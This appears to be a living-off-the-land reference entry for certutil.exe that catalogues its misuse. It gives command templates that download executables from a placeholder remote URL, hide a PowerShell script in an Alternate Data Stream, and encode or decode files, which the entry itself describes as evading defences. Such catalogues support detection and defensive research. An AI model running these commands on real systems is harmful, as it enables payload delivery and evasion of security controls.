Windows binary used for handling certificates
Download and save an executable to disk in the current folder.
certutil.exe -urlcache -f {REMOTEURL:.exe} {PATH:.exe}
Download file from Internet
Download and save an executable to disk in the current folder when a file path is specified, or %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>
when not.
certutil.exe -verifyctl -f {REMOTEURL:.exe} {PATH:.exe}
Download file from Internet
Download and save an executable to %LOCALAPPDATA%low\Microsoft\CryptnetUrlCache\Content\<hash>
.
certutil.exe -URL {REMOTEURL:.exe}
Download file from Internet
Download and save a .ps1 file to an Alternate Data Stream (ADS).
certutil.exe -urlcache -f {REMOTEURL:.ps1} {PATH_ABSOLUTE}:ttt
Download file from Internet and save it in an NTFS Alternate Data Stream
Command to encode a file using Base64
certutil -encode {PATH} {PATH:.base64}
Encode files to evade defensive measures
Command to decode a Base64 encoded file.
certutil -decode {PATH:.base64} {PATH}
Decode files to evade defensive measures
Command to decode a hexadecimal-encoded file.
certutil -decodehex {PATH:.hex} {PATH}
Decode files to evade defensive measures